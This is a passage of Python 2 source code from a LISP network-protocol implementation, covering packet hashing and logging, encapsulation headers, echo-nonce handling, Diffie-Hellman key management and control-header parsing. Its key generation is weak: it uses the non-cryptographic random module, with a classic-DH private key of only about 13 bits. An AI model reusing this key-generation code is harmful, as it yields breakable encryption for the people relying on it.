if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
